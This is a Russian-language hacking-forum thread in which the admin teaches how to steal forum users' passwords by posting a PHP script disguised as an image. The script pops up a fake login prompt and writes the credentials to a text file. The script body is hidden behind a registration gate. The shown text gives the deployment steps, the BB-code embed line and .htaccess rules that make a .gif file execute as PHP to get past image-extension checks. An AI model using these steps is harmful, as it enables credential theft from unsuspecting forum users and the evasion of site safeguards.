Основан 26 Июля 2013 года
freehacks.ru fhacks.me fhacks.pw fhacksnplmzxaaoo.onion
Показано с 1 по 5 из 5
  1. #1
    Trust
    TopicStarter
    Админ негодует :3
    Аватар для admin

    Статус
    Online
    Регистрация
    27.07.2013
    Сообщений
    1,440
    Репутация
    159 + / -
    Безопасность

    Post Фейк-форма веб авторизации

    В этом уроке мы рассмотрим ещё один способ заимствования пароля пользователей, который по сути очень похож на фейк. Во-первых, мы снова заставляем пользователя вводить логин и пароль в нашу подставную форму, во-вторых, мы снова будем вытягивать пароль из пользователя, а не взламывать базу данных сайта. Конечно, это проще и быстрее, но у этого пути взлома есть свои недостатки: мы рассчитываем лишь на невнимательность и легкомыслие нашей жертвы. Но хватит тут теоретических разглагольствований, поехали осуществлять наши адские планы!


    Как это работает

    На примере всеми известного сайта CodHacks.ru
    Со стороны пользователей это выглядит так: сидят они себе на любимом форуме, просматривают темы и вдруг бац! Появляется такое:

    Вид в FireFox

    [Только зарегистрированные могут видеть это. ]
    [свернуть]


    Вид в Google Chrome

    [Только зарегистрированные могут видеть это. ]
    [свернуть]







    Доверчивый пользователь либо сразу честно введёт свой логин и пароль, либо закроет окно... что же, не беда, через некоторое время оно снова откроется! smile Конечно, 100% гарантии что жертва введёт свой настоящий пароль нет, но шанс что кто-нибудь попадётся всё-таки есть.
    Ок, так это увидит жертва, а как такое сделать? Всё очень просто! На любом уважающем себя форуме пользователи имеют возможность вставлять в свои сообщения изображения. Но ведь это так скучно! Давайте вместо изображения вставим так ссылку на скрипт, который запросит логин, пароль и запишет их!




    Готовим тот самый скрипт


    Содержимое его таково:
    Скрытый текст, необходимо выполнение следующих условий: [hide=10,0,10]
    Иметь 10 сообщений(ие) (10 осталось)
    Иметь 0 очко(а,ов) репутации (0 осталось)
    Давность регистрации на форуме не менее 10 дня/дней назад


    Сохраняем всё в файл smile.php. Так же в папке со скриптом создайте пустой base.txt и положите картинку с именем img.gif. Например, эту:
    Объясню немного что делает данный скрипт. Сначала он проверяет, сохранены-ли кукис для данного сайта (они сохраняются после ввода пользователем логина и пароля). Если их нет, запрашивает логин и пароль и сохраняет их в файл base.txt, после чего сохраняет кукис и превращается в загадочный смайл (ну или любую картинку, которую вы сохраните в файле img.gif). Так как кукис сохраняются, при последующих запусках скрипта, он не будет спрашивать логин и пароль, картинка также не будет появляться (после проверки, есть-ли кукис, скрипт будет просто завершаться).


    Тестирование


    И снова нам пригодится наш localhost! Кидаем эти 3 файла (smile.php, img.gif, base.txt) на localhost и открываем наш smile.php в браузере. Должна появится форма с запросом логина и пароля (см. картинку выше). Вводим что угодно (пароль не менее 5 символов) и, если всё правильно, видим на странице нашу картинку из img.gif. После обновления страницы она должна оказаться пустой и запрос ввода больше не должен появляться (ведь кукис уже сохранены). Теперь лезем в base.txt - там должно быть то, что вы вписали в поля логин и пароль. Надеюсь, всё прошло гладко.


    Заливаем всё на хост


    Теперь нужно залить всё на хостинг с поддержкой php, дабы можно было вставлять в сообщения ссылку на наш скрипт. По той же схеме, что и с фейком, заливаем все 3 файла на хост и ставим права 777 для base.txt. Не грех было бы проверить всё ещё раз, не так-ли? =)


    Пользуемся нашим творением!


    Для того, чтобы наша форма ввода появилась на странице форума, нужно просто вставить её адрес в сообщение как картинку, то есть как-то так:
    Код:
    [img ]http://host.com/smile.php[ /img]
    Только напишите в вашем сообщении что-нибудь ещё, чтобы оно не оказалось пустым.
    Пользуйтесь наздоровье, но не забывайте о риске быть забаненным за такие дела (надеюсь, вы поняли о чём я)! До скорого!
    Последний раз редактировалось admin; 29.08.2013 в 03:53.
    [Только зарегистрированные могут видеть это. ]
    JID: [Только зарегистрированные могут видеть это. ] - пока не сижу там, только ЛС.

  2. #2
    Trust
    Аватар для ul1k317

    Статус
    Offline
    Регистрация
    26.08.2013
    Сообщений
    823
    Репутация
    395 + / -
    Web-программист
    На некоторых форумах стоит проверка содержимого BB кодов. Нпример на дамаге расширение пикчи должно быть jpg, gif и т.д. т.е. ...php не пройдет.

  3. #3
    Trust
    TopicStarter
    Админ негодует :3
    Аватар для admin

    Статус
    Online
    Регистрация
    27.07.2013
    Сообщений
    1,440
    Репутация
    159 + / -
    Безопасность
    Цитата Сообщение от dsda Посмотреть сообщение
    На некоторых форумах стоит проверка содержимого BB кодов. Нпример на дамаге расширение пикчи должно быть jpg, gif и т.д. т.е. ...php не пройдет.

    В .htaccess:
    Код:
    AddType application/x-httpd-php .gif
    Получим:
    Код:
    [img ]http://host.com/smile.gif[ /img]
    [Только зарегистрированные могут видеть это. ]
    JID: [Только зарегистрированные могут видеть это. ] - пока не сижу там, только ЛС.

  4. #4
    Trust
    Аватар для ul1k317

    Статус
    Offline
    Регистрация
    26.08.2013
    Сообщений
    823
    Репутация
    395 + / -
    Web-программист
    Цитата Сообщение от admin Посмотреть сообщение
    В .htaccess:
    Код:
    AddType application/x-httpd-php .gif
    Получим:
    Код:
    [img ]http://host.com/smile.gif[ /img]
    не пробовал, но не будет ли тогда на всех gif файлах в верстке ошибок?
    + тут надо иметь доступ к ftp или ssh или чему-то подобному.

  5. #5
    Trust
    TopicStarter
    Админ негодует :3
    Аватар для admin

    Статус
    Online
    Регистрация
    27.07.2013
    Сообщений
    1,440
    Репутация
    159 + / -
    Безопасность
    Цитата Сообщение от dsda Посмотреть сообщение
    не пробовал, но не будет ли тогда на всех gif файлах в верстке ошибок?
    + тут надо иметь доступ к ftp или ssh или чему-то подобному.
    1:
    Код:
    <Files "smile.gif">
    AddType application/x-httpd-php .gif
    </Files>
    2:

    Скрытый текст

    [Только зарегистрированные могут видеть это. ]
    [свернуть]
    [Только зарегистрированные могут видеть это. ]
    JID: [Только зарегистрированные могут видеть это. ] - пока не сижу там, только ЛС.

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  

Информация на сайте предоставлена исключительно в ознакомительных целях, использование знаний в противозаконных целях преследуется по закону! Администрация не несет ответственности за ваши деяния.